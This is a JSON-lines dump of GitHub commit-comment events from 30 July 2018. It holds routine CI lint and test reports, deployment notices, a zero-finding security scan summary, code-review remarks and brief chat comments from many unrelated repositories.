{"id":"8038421428","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/Products.statusmessages"},"payload":{"comment":{"id":29888819,"position":null,"line":null,"path":null,"commit_id":"2da458219ce61ec5e43be32480564b183ad176c6","created_at":"2018-07-30T15:20:58Z","updated_at":"2018-07-30T15:20:58Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-Products.statusmessages/30/violations\n```\nProducts/statusmessages/message.py:88:27: C812 missing trailing comma\nProducts/statusmessages/tests/test_adapter.py:35:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:221:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_adapter.py:241:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:308:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_encoding.py:3:1: I003 isort expected 1 blank line in imports, found 0\nProducts/statusmessages/tests/test_encoding.py:4:1: E302 expected 2 blank lines, found 1\nProducts/statusmessages/tests/test_encoding.py:14:38: C812 missing trailing comma\nProducts/statusmessages/tests/test_encoding.py:32:9: F401 'Products.statusmessages.message.Message' imported but unused\nProducts/statusmessages/tests/test_encoding.py:75:29: E203 whitespace before ','\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-30T15:20:58Z"}
{"id":"8038422656","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29888826,"position":null,"line":null,"path":null,"commit_id":"1282e8ead703cd9b6221693c3f7e5ac24ed98a80","created_at":"2018-07-30T15:21:10Z","updated_at":"2018-07-30T15:21:10Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-30T15:21:10Z"}
{"id":"8038427208","type":"CommitCommentEvent","actor":{"login":"greglever"},"repo":{"name":"genomicsengland/GelReportModels"},"payload":{"comment":{"id":29888839,"position":null,"line":null,"path":null,"commit_id":"c51421a2020afbf1636fb7635412c6cc1201bd44","created_at":"2018-07-30T15:21:52Z","updated_at":"2018-07-30T15:21:52Z","author_association":"COLLABORATOR","body":"```\r\nINFO:root:Build/s finished succesfully!\r\nRemoving intermediate container 2ea1c7d7749c\r\n ---> 2a0103619db2\r\nSuccessfully built 2a0103619db2\r\nSuccessfully tagged gel:latest\r\nroot@0568bf1dba0b:/gel# cd GelReportModels/\r\nroot@0568bf1dba0b:/gel/GelReportModels# python -m unittest discover\r\n\r\n----------------------------------------------------------------------\r\nRan 125 tests in 13.975s\r\n\r\nOK\r\nroot@0568bf1dba0b:/gel/GelReportModels# \r\n```"}},"created_at":"2018-07-30T15:21:52Z"}
{"id":"8038428241","type":"CommitCommentEvent","actor":{"login":"dizoEX2"},"repo":{"name":"roahnosh/vitacheat"},"payload":{"comment":{"id":29888844,"position":null,"line":null,"path":null,"commit_id":"3147db57e9d735c771d2ca6892c5814a828685de","created_at":"2018-07-30T15:22:02Z","updated_at":"2018-07-30T15:22:02Z","author_association":"NONE","body":"hello im new to this uhh where can i contact you cuz i have a requestt"}},"created_at":"2018-07-30T15:22:02Z"}
{"id":"8038429826","type":"CommitCommentEvent","actor":{"login":"yinshixiao"},"repo":{"name":"yinshixiao/js-lib"},"payload":{"comment":{"id":29888851,"position":null,"line":null,"path":null,"commit_id":"95f9d3ed527428ecbd296a4d6be513f852f8a215","created_at":"2018-07-30T15:22:16Z","updated_at":"2018-07-30T15:22:16Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-30T15:22:16Z"}
{"id":"8038430056","type":"CommitCommentEvent","actor":{"login":"VivianSolide"},"repo":{"name":"VivianSolide/interact"},"payload":{"comment":{"id":29888852,"position":13,"line":13,"path":"style.css","commit_id":"f3f8f33ceeaad9a0a5b59bfe82284f13827fcd91","created_at":"2018-07-30T15:22:18Z","updated_at":"2018-07-30T15:22:18Z","author_association":"OWNER","body":"tu es sûr de ton coup ?"}},"created_at":"2018-07-30T15:22:18Z"}
{"id":"8038433776","type":"CommitCommentEvent","actor":{"login":"baerkins"},"repo":{"name":"bluecadet/greene-space"},"payload":{"comment":{"id":29888858,"position":null,"line":null,"path":null,"commit_id":"79034e7c557ccb4983b9221150717e4e61a684b0","created_at":"2018-07-30T15:22:51Z","updated_at":"2018-07-30T15:22:51Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-52-greene-space.pantheonsite.io/)\n\nCreated multidev environment [ci-52](https://dashboard.pantheon.io/sites/1ffe8818-30b8-4947-851f-e8a90715b486#ci-52) for greene-space."}},"created_at":"2018-07-30T15:22:51Z"}
{"id":"8038434216","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29888860,"position":9,"line":9,"path":"1/1339.c","commit_id":"b6a42a7c2babbcbb507936eb5588bef2f48812e0","created_at":"2018-07-30T15:22:55Z","updated_at":"2018-07-30T15:22:55Z","author_association":"OWNER","body":"여기에만 뭔가를 기록할 수 있는가"}},"created_at":"2018-07-30T15:22:55Z"}
{"id":"8038441115","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888884,"position":5,"line":246,"path":"source/js/toolbar.js","commit_id":"f55112db126c716bfc2f4c31d8c91272cf0e3402","created_at":"2018-07-30T15:23:58Z","updated_at":"2018-07-30T15:23:58Z","author_association":"NONE","body":"there was another part in the diva code that `jshint ignore`d to avoid the warning, which is why I figured this was okay. I'll fix it"}},"created_at":"2018-07-30T15:23:58Z"}
{"id":"8038480169","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888984,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:29:47Z","updated_at":"2018-07-30T15:29:47Z","author_association":"NONE","body":"![38085850_2135751039799279_8744881605991989248_n](https://user-images.githubusercontent.com/40116352/43407133-6c5a58d0-9450-11e8-9ff3-f68b86dc0ce5.jpg)\r\n"}},"created_at":"2018-07-30T15:29:47Z"}
{"id":"8038483048","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"ThomasKaiser/sbc-bench"},"payload":{"comment":{"id":29888991,"position":15,"line":284,"path":"sbc-bench.sh","commit_id":"057c72ebd8a4455d82f5f8c6b656bf603b9bd051","created_at":"2018-07-30T15:30:14Z","updated_at":"2018-07-30T15:30:14Z","author_association":"NONE","body":"Syntax error - extra ')'"}},"created_at":"2018-07-30T15:30:14Z"}
{"id":"8038483473","type":"CommitCommentEvent","actor":{"login":"zpincus"},"repo":{"name":"drew-sinha/elegant"},"payload":{"comment":{"id":29888994,"position":90,"line":90,"path":"elegant/clean_timepoint_data.py","commit_id":"9183bb05721a61f85044ce26b65f9e4a40b46eff","created_at":"2018-07-30T15:30:17Z","updated_at":"2018-07-30T15:30:17Z","author_association":"NONE","body":"I'd suggest either changing this to `postmortem_timepoints`: how many timepoints to keep, rather than how many hours to keep, or have both parameters and take the maximum. (The default should be 1 timepoint, and in fact it shouldn't allow you to keep fewer than one postmortem timepoint.)"}},"created_at":"2018-07-30T15:30:17Z"}
{"id":"8038487606","type":"CommitCommentEvent","actor":{"login":"mrlukemackenzie"},"repo":{"name":"TalliLlani/demo-project"},"payload":{"comment":{"id":29889005,"position":16,"line":17,"path":"index.html","commit_id":"68db551ec992658a320ab455c8d4c9b09771499a","created_at":"2018-07-30T15:30:50Z","updated_at":"2018-07-30T15:30:50Z","author_association":"COLLABORATOR","body":" This line should be\r\n\r\n<body style=\"background-color:rebeccapurple;\">"}},"created_at":"2018-07-30T15:30:50Z"}
{"id":"8038489365","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29889013,"position":null,"line":null,"path":null,"commit_id":"07924a9b0ec83474d8dda97b26bb8f5bcaa64d44","created_at":"2018-07-30T15:31:05Z","updated_at":"2018-07-30T15:31:05Z","author_association":"COLLABORATOR","body":"Are you planning to replace this with a dynamic read of the locations from the database as a next step?"}},"created_at":"2018-07-30T15:31:05Z"}
{"id":"8038489830","type":"CommitCommentEvent","actor":{"login":"zpincus"},"repo":{"name":"drew-sinha/elegant"},"payload":{"comment":{"id":29889014,"position":93,"line":93,"path":"elegant/clean_timepoint_data.py","commit_id":"9183bb05721a61f85044ce26b65f9e4a40b46eff","created_at":"2018-07-30T15:31:10Z","updated_at":"2018-07-30T15:31:10Z","author_association":"NONE","body":"Deleting excluded positions should really be a separate function."}},"created_at":"2018-07-30T15:31:10Z"}
{"id":"8038491361","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29889018,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-30T15:31:23Z","updated_at":"2018-07-30T15:31:23Z","author_association":"OWNER","body":"Checkmarx scan results 30 Jul 2018 18:31 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-30T15:31:23Z"}
{"id":"8038494360","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889023,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:31:49Z","updated_at":"2018-07-30T15:31:49Z","author_association":"OWNER","body":"等我看看啊"}},"created_at":"2018-07-30T15:31:49Z"}
{"id":"8038500006","type":"CommitCommentEvent","actor":{"login":"mg979"},"repo":{"name":"mg979/vim-visual-multi"},"payload":{"comment":{"id":29889034,"position":null,"line":null,"path":null,"commit_id":"d57e4a77c79d641746d6f5a441c5d342d23fc142","created_at":"2018-07-30T15:32:42Z","updated_at":"2018-07-30T15:32:42Z","author_association":"OWNER","body":"Yes, sorry. I had fixed it for #11 but then I must have broken it again. Fixing now."}},"created_at":"2018-07-30T15:32:42Z"}
{"id":"8038506787","type":"CommitCommentEvent","actor":{"login":"dertseha"},"repo":{"name":"inkyblackness/hacked"},"payload":{"comment":{"id":29889051,"position":22,"line":22,"path":"ui/gui/StepSliderInt.go","commit_id":"b41174b9fec00f0f59480eccdbdd1cba05dc337d","created_at":"2018-07-30T15:33:47Z","updated_at":"2018-07-30T15:33:47Z","author_association":"MEMBER","body":"Hello Omar! Thank you for stopping by and for the suggestion.\r\nI'll integrate it :)"}},"created_at":"2018-07-30T15:33:47Z"}
{"id":"8038509812","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"rohanKanojia/kubernetes-client"},"payload":{"comment":{"id":29889058,"position":37,"line":84,"path":"kubernetes-client/src/main/java/io/fabric8/kubernetes/client/dsl/internal/ServiceOperationsImpl.java","commit_id":"5b772406ce5b3fe191091c176ed4c033fd6ee385","created_at":"2018-07-30T15:34:16Z","updated_at":"2018-07-30T15:34:16Z","author_association":"NONE","body":"`ServiceToURLProvider` should have an `order` method which returns an integer that allows you to get an order to apply the `ServiceToURLProvider` since now by default is random (depending on the  Classpath).\r\n\r\nSo what you will need is to get all `ServiceToURLProvider` implementations, order them with `Collections.sort` method and then iterate."}},"created_at":"2018-07-30T15:34:16Z"}
{"id":"8038519125","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conjure-python-client-feedstock"},"payload":{"comment":{"id":29889078,"position":null,"line":null,"path":null,"commit_id":"56dcacdc8711d3bd8001aaeee29a6ca630697ee7","created_at":"2018-07-30T15:35:43Z","updated_at":"2018-07-30T15:35:43Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @iamdanfox, @ferozco, @ahigginspalantir were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T15:35:43Z"}
{"id":"8038521082","type":"CommitCommentEvent","actor":{"login":"Sgathec"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":29889081,"position":12,"line":35,"path":"ZkLobbyServer/autohost/Commands/CmdMap.cs","commit_id":"b2cbd037ffd6821ae430b290973519d745f8e9ac","created_at":"2018-07-30T15:36:02Z","updated_at":"2018-07-30T15:36:02Z","author_association":"NONE","body":"Please fix the typo too. The text should be \"Cannot find such a map.\"."}},"created_at":"2018-07-30T15:36:02Z"}
{"id":"8038522756","type":"CommitCommentEvent","actor":{"login":"machabaid"},"repo":{"name":"VivianSolide/interact"},"payload":{"comment":{"id":29889086,"position":13,"line":13,"path":"style.css","commit_id":"f3f8f33ceeaad9a0a5b59bfe82284f13827fcd91","created_at":"2018-07-30T15:36:17Z","updated_at":"2018-07-30T15:36:17Z","author_association":"NONE","body":"et laisser le message 9 secondes, mais j'ai pas vu on ça se foutait\n\n2018-07-30 17:26 GMT+02:00 Félix Macherez <felix.macherez@gmail.com>:\n\n> regarde ce que ça fait, mais normalement c'est bon\n>\n> 2018-07-30 17:22 GMT+02:00 Vivian Sarazin <notifications@github.com>:\n>\n>> tu es sûr de ton coup ?\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/VivianSolide/interact/commit/f3f8f33ceeaad9a0a5b59bfe82284f13827fcd91#commitcomment-29888852>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/An9kTTq_wUDMX9SL8szPVR5WQPXLZ9Phks5uLySqgaJpZM4VmP2k>\n>> .\n>>\n>\n>\n>\n> --\n> Felix Macherez\n> http://felixmacherez.com/  <http://felixmacherez.com/>\n>\n\n\n\n-- \nFelix Macherez\nhttp://felixmacherez.com/  <http://felixmacherez.com/>\n"}},"created_at":"2018-07-30T15:36:17Z"}
{"id":"8038525559","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29889095,"position":null,"line":null,"path":null,"commit_id":"518f2d8b38bf0ee56029fb02f0d059902a44229a","created_at":"2018-07-30T15:36:44Z","updated_at":"2018-07-30T15:36:44Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-452](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-452).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-452-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T15:36:44Z"}
{"id":"8038525645","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29889097,"position":null,"line":null,"path":null,"commit_id":"29b34fd562ab1aead3764109bc1424f89115d174","created_at":"2018-07-30T15:36:44Z","updated_at":"2018-07-30T15:36:44Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-32](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-32-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-30T15:36:44Z"}
{"id":"8038531386","type":"CommitCommentEvent","actor":{"login":"maxinpar"},"repo":{"name":"maxinpar/ShortGameBuddy"},"payload":{"comment":{"id":29889107,"position":null,"line":null,"path":null,"commit_id":"0f2a6e493d25a52d7afe5c144ba151b34fcaec90","created_at":"2018-07-30T15:37:38Z","updated_at":"2018-07-30T15:37:38Z","author_association":"OWNER","body":"Yay!"}},"created_at":"2018-07-30T15:37:38Z"}
{"id":"8038533767","type":"CommitCommentEvent","actor":{"login":"reefdog"},"repo":{"name":"slifty/dotfiles"},"payload":{"comment":{"id":29889114,"position":null,"line":null,"path":null,"commit_id":"202dbfe9515a26230b9f415f0d1a19aee365f511","created_at":"2018-07-30T15:38:01Z","updated_at":"2018-07-30T15:38:01Z","author_association":"NONE","body":"readling should be a thing"}},"created_at":"2018-07-30T15:38:01Z"}
{"id":"8038535016","type":"CommitCommentEvent","actor":{"login":"Vitaliy-1"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":29889117,"position":null,"line":null,"path":null,"commit_id":"9363b4a47e905f071b8198e925ef79cf05da4ba7","created_at":"2018-07-30T15:38:12Z","updated_at":"2018-07-30T15:38:12Z","author_association":"CONTRIBUTOR","body":"@asmecher \r\nThink this should be like: `{assign var=\"formPath\" value=\"institutional\"|to_array:$subscriptionId}`\r\nI'll ship some fixes related to the subscription pages tommorow. "}},"created_at":"2018-07-30T15:38:12Z"}
{"id":"8038540102","type":"CommitCommentEvent","actor":{"login":"olegz"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29889121,"position":264,"line":264,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T15:39:02Z","updated_at":"2018-07-30T15:39:02Z","author_association":"NONE","body":"Similar to the previous comment about `single` I now wonder if from line 264-176 can be removed leaving \r\n```\r\nreturn Flux.from(result).collectList()\r\n\t\t\t\t.flatMap(body -> Mono.just(builder.body(body)));\r\n```\r\nYes there are few test failures when you do that, but they are all similar to the one `single` issue i was commenting on earlier.\r\n\r\nBasically it is the difference of\r\n```\r\norg.junit.ComparisonFailure: expected:<\"[[{\"value\":\"FOO\"}]]\"> but was:<\"[{\"value\":\"FOO\"}]\">****\r\n```"}},"created_at":"2018-07-30T15:39:02Z"}
{"id":"8038542340","type":"CommitCommentEvent","actor":{"login":"allsey87"},"repo":{"name":"ilpincy/argos3"},"payload":{"comment":{"id":29889122,"position":null,"line":null,"path":null,"commit_id":"1e96147df00e4d12645b4bcd78c13ce2c75f99f4","created_at":"2018-07-30T15:39:23Z","updated_at":"2018-07-30T15:39:23Z","author_association":"COLLABORATOR","body":"I think I am getting most notifications (e.g. for issues etc) but not for plain commits. I had a quick look at the notification settings but couldn't see an option for getting commit notifications.\r\n\r\nGoogle gave me the following solution that doesn't apply since I am not the owner of the repository and don't have access to the settings pane... https://help.github.com/articles/choosing-the-types-of-notifications-you-receive/"}},"created_at":"2018-07-30T15:39:23Z"}
{"id":"8038542773","type":"CommitCommentEvent","actor":{"login":"Atharex91"},"repo":{"name":"CompleteBlenderCreator/01-Introduction-And-Setup"},"payload":{"comment":{"id":29889127,"position":null,"line":null,"path":null,"commit_id":"06130d268e8c6f33cd3bd8379e1cb4ff21595b31","created_at":"2018-07-30T15:39:27Z","updated_at":"2018-07-30T15:39:27Z","author_association":"NONE","body":"Hi everyone! Lets get started. Wish the best for everyone!"}},"created_at":"2018-07-30T15:39:27Z"}
{"id":"8038543541","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29889130,"position":null,"line":null,"path":null,"commit_id":"ed0296ce9f0b5bdf4956c5b07a41890161956987","created_at":"2018-07-30T15:39:34Z","updated_at":"2018-07-30T15:39:34Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-MacOS-10.9-clang: OK (2951 of 2953 tests passed, 0 test warnings)\n\nMessages:\n\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T15:39:34Z"}
{"id":"8038550690","type":"CommitCommentEvent","actor":{"login":"feizai1010"},"repo":{"name":"feizai1010/hello-world."},"payload":{"comment":{"id":29889154,"position":null,"line":null,"path":null,"commit_id":"b5aa5229341abbaf0d293ac7806d385dbb044dfe","created_at":"2018-07-30T15:40:40Z","updated_at":"2018-07-30T15:40:40Z","author_association":"OWNER","body":"也许"}},"created_at":"2018-07-30T15:40:40Z"}
{"id":"8038551336","type":"CommitCommentEvent","actor":{"login":"max-spark"},"repo":{"name":"SparkMicroGrants/sparkit"},"payload":{"comment":{"id":29889156,"position":null,"line":null,"path":null,"commit_id":"39ef1362724c66f17b415c018d38909ae61c6232","created_at":"2018-07-30T15:40:46Z","updated_at":"2018-07-30T15:40:46Z","author_association":"NONE","body":"Remove change"}},"created_at":"2018-07-30T15:40:46Z"}
{"id":"8038558724","type":"CommitCommentEvent","actor":{"login":"zpincus"},"repo":{"name":"drew-sinha/elegant"},"payload":{"comment":{"id":29889170,"position":115,"line":115,"path":"elegant/clean_timepoint_data.py","commit_id":"9183bb05721a61f85044ce26b65f9e4a40b46eff","created_at":"2018-07-30T15:41:57Z","updated_at":"2018-07-30T15:41:57Z","author_association":"NONE","body":"up-to-date annotation files contain a `timestamp` entry which is the unix timestamp when that precise acquisition happened. This might be more proper than parsing the `timepoint_label`, or not. Hard to say. Moot point if we just go by a certain timepoint count."}},"created_at":"2018-07-30T15:41:57Z"}
{"id":"8038561321","type":"CommitCommentEvent","actor":{"login":"mg979"},"repo":{"name":"mg979/vim-visual-multi"},"payload":{"comment":{"id":29889181,"position":null,"line":null,"path":null,"commit_id":"d57e4a77c79d641746d6f5a441c5d342d23fc142","created_at":"2018-07-30T15:42:22Z","updated_at":"2018-07-30T15:42:22Z","author_association":"OWNER","body":"It should be fixed now (https://github.com/mg979/vim-visual-multi/commit/4262f456796fd39efae315f9658e6f12293f69d0)."}},"created_at":"2018-07-30T15:42:22Z"}
{"id":"8038563216","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29889190,"position":null,"line":null,"path":null,"commit_id":"9800b95fc05bb2920ae50b6c6082409ffc403afc","created_at":"2018-07-30T15:42:40Z","updated_at":"2018-07-30T15:42:40Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-118](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-118).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-118-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-30T15:42:40Z"}
{"id":"8038564279","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29889192,"position":null,"line":null,"path":null,"commit_id":"24dbe9775c1901b24a514ead28923227922b30af","created_at":"2018-07-30T15:42:50Z","updated_at":"2018-07-30T15:42:50Z","author_association":"CONTRIBUTOR","body":"This change breaks existing applications that draw to a background/memory DC.    If I set a color of red (0xFF, 0x00, 0x00) and draw some text or similar to my background DC, the resulting image has the text that is not completely red.  (0xFF, 0x26, 0x00). "}},"created_at":"2018-07-30T15:42:50Z"}
{"id":"8038567034","type":"CommitCommentEvent","actor":{"login":"johnxie"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29889200,"position":null,"line":null,"path":null,"commit_id":"892212bad2daadd373f4be241e4cd9889b0a1005","created_at":"2018-07-30T15:43:15Z","updated_at":"2018-07-30T15:43:15Z","author_association":"NONE","body":"Thank you!"}},"created_at":"2018-07-30T15:43:15Z"}
{"id":"8038567868","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29889205,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T15:43:23Z","updated_at":"2018-07-30T15:43:23Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1704 of 1704 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.41%25-green.png)</a>\n"}},"created_at":"2018-07-30T15:43:23Z"}
{"id":"8038570935","type":"CommitCommentEvent","actor":{"login":"zpincus"},"repo":{"name":"drew-sinha/elegant"},"payload":{"comment":{"id":29889213,"position":50,"line":50,"path":"elegant/clean_timepoint_data.py","commit_id":"9183bb05721a61f85044ce26b65f9e4a40b46eff","created_at":"2018-07-30T15:43:52Z","updated_at":"2018-07-30T15:43:52Z","author_association":"NONE","body":"I'd suggest `remove_timepoint_for_position` and `remove_timepoint_for_all` or some similar pair of names rather than `remove_timepoint ` and `purge_timepoint_from_experiment`... (what's the difference between \"removing\" and \"purging\"?)"}},"created_at":"2018-07-30T15:43:52Z"}
{"id":"8038578874","type":"CommitCommentEvent","actor":{"login":"ShadowsWithinMe"},"repo":{"name":"Toonkit/Website"},"payload":{"comment":{"id":29889243,"position":null,"line":null,"path":null,"commit_id":"fd07d9a619ebc0cf3911564e71395c115cf54e62","created_at":"2018-07-30T15:45:10Z","updated_at":"2018-07-30T15:45:10Z","author_association":"NONE","body":"I'm having this error and I cannot seem to fix it. I launch the engine and sometimes it will load, but it always crashes and then no longer works and only gives me the issue stated above. I have tried technical support, but there is apparently no other recommendations. :/"}},"created_at":"2018-07-30T15:45:10Z"}
{"id":"8038584355","type":"CommitCommentEvent","actor":{"login":"seiflotfy"},"repo":{"name":"antirez/redis"},"payload":{"comment":{"id":29889261,"position":null,"line":null,"path":null,"commit_id":"3c19ae941d17dee7f89c282946bc379ba2106b09","created_at":"2018-07-30T15:46:02Z","updated_at":"2018-07-30T15:46:02Z","author_association":"NONE","body":"Thank you 😄 \r\nYou are the best"}},"created_at":"2018-07-30T15:46:02Z"}
{"id":"8038585901","type":"CommitCommentEvent","actor":{"login":"pycc34"},"repo":{"name":"pycc34/contact"},"payload":{"comment":{"id":29889267,"position":null,"line":null,"path":null,"commit_id":"89551a359a548b77361bd3852f45e456092a7585","created_at":"2018-07-30T15:46:17Z","updated_at":"2018-07-30T15:46:17Z","author_association":"OWNER","body":"app zip"}},"created_at":"2018-07-30T15:46:17Z"}
